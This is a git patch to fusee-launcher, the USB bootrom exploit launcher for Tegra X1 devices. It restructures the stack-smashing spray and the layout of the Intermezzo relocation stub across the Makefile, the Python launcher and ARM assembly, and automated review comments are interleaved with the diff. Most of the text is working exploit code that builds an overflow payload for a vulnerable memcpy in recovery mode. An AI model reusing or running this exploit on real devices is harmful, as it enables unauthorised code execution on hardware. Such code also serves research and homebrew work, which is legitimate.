From 9e0ed49e717eddd6f3e6ce32c1aac02979f5c9da Mon Sep 17 00:00:00 2001
From: trisz404
Date: Wed, 2 May 2018 16:10:51 +0200
Subject: [PATCH] Restruct the payload, so it can fit more code
---
 Makefile | 22 ++++++++++++++--------
 fusee-launcher.py | 30 +++++++++++++++++++-----------
 intermezzo.S | 17 ++++++++++++-----
 intermezzo.bin | Bin 92 -> 0 bytes
 intermezzo.elf | Bin 62096 -> 0 bytes
 intermezzo.o | Bin 872 -> 0 bytes
 6 files changed, 45 insertions(+), 24 deletions(-)
 delete mode 100755 intermezzo.bin
 delete mode 100755 intermezzo.elf
 delete mode 100644 intermezzo.o
diff --git a/Makefile b/Makefile
index 6179ab8..1f1347a 100644
--- a/Makefile
+++ b/Makefile
@@ -25,27 +25,33 @@ LDFLAGS =
 all: intermezzo.bin
-# The start of the BPMP IRAM.
-START_OF_IRAM := 0x40000000
+# The new address of the Intermezzo after copy
+INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000
 # The address to which Intermezzo is to be loaded by the payload launcher.
-INTERMEZZO_ADDRESS := 0x4001F000
+INTERMEZZO_ADDRESS := 0x40010000
 # The address we want the final payload to be located at.
 RELOCATION_TARGET := 0x40010000
 # The addrss and length of the data loaded by f-g.
-LOAD_BLOCK_START := 0x40020000
-LOAD_BLOCK_LENGTH := 0x20000
+PAYLOAD_START_ADDR := 0x40010E40
+STACK_SPRAY_START := 0x40014E40
+STACK_SPRAY_END := 0x40017000
+BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
+AFTER_SPRAY_LENGTH := 0x30000
 ENTRY_POINT_ADDRESS := 0x40010000
 # Provide the definitions used in the intermezzo stub.
 DEFINES := \
- -DSTART_OF_IRAM=$(START_OF_IRAM) \
+ -DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
 -DRELOCATION_TARGET=$(RELOCATION_TARGET) \
- -DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
- -DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
+ -DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
+ -DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
+ -DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
+ -DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
+ -DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
 -DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)
 intermezzo.elf: intermezzo.o
diff --git a/fusee-launcher.py b/fusee-launcher.py
index fa7f54e..39f1d8d 100755
--- a/fusee-launcher.py
+++ b/fusee-launcher.py
@@ -32,8 +32,9 @@ import platform
 # specify the locations of important load components
 RCM_PAYLOAD_ADDR = 0x40010000
-INTERMEZZO_LOCATION = 0x4001F000
-PAYLOAD_LOAD_BLOCK = 0x40020000
+PAYLOAD_START_ADDR = 0x40010E40
+STACK_SPRAY_START = 0x40014E40
+STACK_SPRAY_END = 0x40017000
 # notes:
 # GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
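Review bot: PAYLOAD_START_ADDR, STACK_SPRAY_START and STACK_SPRAY_END are now defined as separate literals in two places — here and in the fusee-launcher.py hunk below (`PAYLOAD_START_ADDR = 0x40010E40` and the two lines after it) — with nothing that keeps them equal, so a later edit to one file silently desynchronises the image the launcher assembles from the layout the stub expects. Consider having one side derive from the other, or at least adding a cross-reference comment in both files, e.g. `# Must match PAYLOAD_START_ADDR / STACK_SPRAY_START / STACK_SPRAY_END in fusee-launcher.py.` The retained comment `# The addrss and length of the data loaded by f-g.` no longer describes the five values under it (and is misspelled); something like `# Layout of the data sent by the launcher: payload start, the stack-spray window, and the two chunk lengths the stub copies.` would. `AFTER_SPRAY_LENGTH := 0x30000` is the only new value not derived from the others, so a note on where that bound comes from would help the next reader.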
@@ -445,9 +446,6 @@ payload += b'\0' * (680 - len(payload))
 # Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
 # We'll use this data to smash the stack when we execute the vulnerable memcpy.
 print("\nSetting ourselves up to smash the stack...")
-repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
-intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
-payload += (intermezzo_location_raw * repeat_count)
 # Include the Intermezzo binary in the command stream. This is our first-stage
 # payload, and it's responsible for relocating the final payload to 0x40010000.
@@ -458,15 +456,25 @@ with open(intermezzo_path, "rb") as f:
 payload += intermezzo
-# Finally, pad until we've reached the position we need to put the payload.
-# This ensures the payload winds up at the location Intermezzo expects.
-position = INTERMEZZO_LOCATION + intermezzo_size
-padding_size = PAYLOAD_LOAD_BLOCK - position
+# Pad the payload till the start of the payload
+padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
 payload += (b'\0' * padding_size)
-# Read the payload into memory.
+target_payload = b''
+# Read the rest of the payload into memory.
 with open(payload_path, "rb") as f:
- payload += f.read()
+ target_payload = f.read()
+
+# First part of the payload
+padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR
+payload += target_payload[:padding_size]
+
+# Gap in the payload, stack spray
+repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
+payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)
+
+# Read the rest of the payload into memory.
+payload += target_payload[padding_size:]
 # Pad the payload to fill a USB request exactly, so we don't send a short
 # packet and break out of the RCM loop.
diff --git a/intermezzo.S b/intermezzo.S
index 2ab2371..098f26d 100644
--- a/intermezzo.S
+++ b/intermezzo.S
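Review bot: The context lines kept at the top of this hunk — `# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.`, the line after it, and the `print("\nSetting ourselves up to smash the stack...")` — now describe the three lines this commit removes: INTERMEZZO_LOCATION no longer exists, and the spray is built further down, after the first payload chunk. Move or rewrite the comment and the print so they sit beside the new `repeat_count` lines in the following hunk; as left here, they precede code that only reads the Intermezzo binary.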
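Review bot: The new layout arithmetic does not check its own preconditions, so an Intermezzo stub that has grown or a payload file that is too small yields a silently misassembled image instead of an error. `padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)` goes negative once the stub exceeds 0xE40 bytes and `b'\0' * padding_size` then evaluates to `b''` without complaint; similarly `target_payload[:padding_size]` is shorter than `STACK_SPRAY_START - PAYLOAD_START_ADDR` when the file is smaller than that, which shifts everything appended after it. Fail loudly instead, e.g. `if padding_size < 0: raise ValueError("Intermezzo is larger than the space before PAYLOAD_START_ADDR")` and a matching `len(target_payload)` check before the slice. Minor points: `padding_size` is reused for two different quantities (a zero-fill length, then a slice length), the initial `target_payload = b''` is dead, the comment `# Read the rest of the payload into memory.` above the `open` is misleading because that read is the whole file, and `int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)` reads better as `//`.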
@@ -8,15 +8,15 @@ _start:
 // First, we'll need to move ourselves _out_ of the target area.
- // We'll copy down into the start of the IRAM.
- ldr r0, =START_OF_IRAM
+ // We'll copy down into the IRAM.
+ ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
 ldr r1, =post_relocation
 ldr r2, =intermezzo_end
 sub r2, r2, r1
 bl copy
 // Jump to the start of RAM, which should now contain the post-relocation code.
- ldr r0, =START_OF_IRAM
+ ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
 bx r0
@@ -25,8 +25,15 @@ post_relocation:
 // Next, we'll copy our payload down to the appropriate relocaiton address.
 ldr r0, =RELOCATION_TARGET
- ldr r1, =LOAD_BLOCK_START
- ldr r2, =LOAD_BLOCK_LENGTH
+ ldr r1, =PAYLOAD_START_ADDR
+ ldr r2, =BEFORE_SPRAY_LENGTH
+ bl copy
+
+ ldr r0, =RELOCATION_TARGET
+ ldr r1, =BEFORE_SPRAY_LENGTH
+ add r0, r0, r1
+ ldr r1, =STACK_SPRAY_END
+ ldr r2, =AFTER_SPRAY_LENGTH
 bl copy
 // Finally, jump into the relocated target.
diff --git a/intermezzo.bin b/intermezzo.bin
deleted file mode 100755
index b0f45127b4d68456fe7eadcf4943f1ef2fe6a89b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 92
zcmZQ%T=3XIVE$7Fh51hz6`US$FfhDk1d0j#*MG>su;8H%!~CZ@KzSyO1&^-V)Ajc zvpySBF>$(oazoXLs5;9>5hW&1YbUdb009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1pY69s@mP}v~~_V?VZD_{p|ath@Yj_ z8a~*I*xkDyJBRmkzcIVJU*+Dd%*$T$;n#!a!!HNT_R^1E!{LqFS!*9vo#l*(5{=IM zwY2K?x~uC^UCzs?#-(aH5Bcjjxi4ZOE;dX=<3gnw$HOb-fV2L5R$R@rJiC-jekbQA zWBJ|87sv8@nV-IAL@WEBWIj5th5Z;_26`UJG!cSAL^K! zUwSpyt?R-1>ifF4UEbp#$Ia|3a#N+heCttuW4S&Xt+Tb*Ohjyr>dV=8eU#)n(l4gj ucRn_bBOaY+fBH&)W2|21dEYXh%*cN!ni;K(>5TF7X7aq3SsRVfbAJOW0dau<
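Review bot: The new comment `// We'll copy down into the IRAM.` says less than the one it replaces, and the retained line `// Jump to the start of RAM, which should now contain the post-relocation code.` is now wrong, because INTERMEZZO_RELOCATED_ADDRESS (0x4000F000 in the Makefile hunk) is no longer the start of IRAM. Suggest `// We'll copy the post-relocation code down to INTERMEZZO_RELOCATED_ADDRESS, just below RELOCATION_TARGET.` and `// Jump to the relocated copy of the post-relocation code.` Nothing visible checks that `intermezzo_end - post_relocation` fits in the 0x1000 bytes between INTERMEZZO_RELOCATED_ADDRESS and RELOCATION_TARGET; if the stub grows past that, the first copy in `post_relocation` would overwrite the code that is executing it, so a build-time size assertion (in the Makefile or linker script) is worth adding.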
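Review bot: Both copies added here move data to a lower, overlapping address — RELOCATION_TARGET (0x40010000) takes BEFORE_SPRAY_LENGTH bytes from PAYLOAD_START_ADDR (0x40010E40), and RELOCATION_TARGET + BEFORE_SPRAY_LENGTH takes AFTER_SPRAY_LENGTH (0x30000) bytes from STACK_SPRAY_END (0x40017000) — which is only correct if `copy` proceeds from the first byte upward. `copy` is outside this hunk, so that requirement should be stated at the call site, e.g. `// NOTE: destination lies below and overlaps the source; copy must run in ascending order.` The second copy also always moves AFTER_SPRAY_LENGTH bytes regardless of how much payload the launcher actually sent, so a shorter payload is followed by whatever the rest of that IRAM range held; presumably harmless for a payload that ignores its tail, but a comment saying so would spare the next reader tracing it. The `post_relocation` block continues past the end of this hunk.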
diff --git a/intermezzo.o b/intermezzo.o
deleted file mode 100644
index 793e1216079fe1d3e35d262cdd1ee866ad0b478d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 872
zcma)4%}N4M6h7C#v^EA6{YVXDAS9DSi!{RZXbO|Dfpa=}a*f0aWGoaHiMinrTtIk!dJ5wSB21Bm3V{fbF)I?Z27Mavx1b9F zesm+>;aR$a+5Sh-Wa)e4_8mHnW|tV$)xEPEcA`Qnu+m2zw4 zdu4lQ@IUOKjE`R5z6E^)(@6Sa2b_RezW;(nJpU4m*YjD&VF$jiZ|4<$5M0YRgmL{} zb-8Ix6Ep$$+we7$?zal9dvW{&35$gfUB^8A^{0t<&>M_r;r;PGc+aeZ{i;}ajF^V* F_X98)S6l!9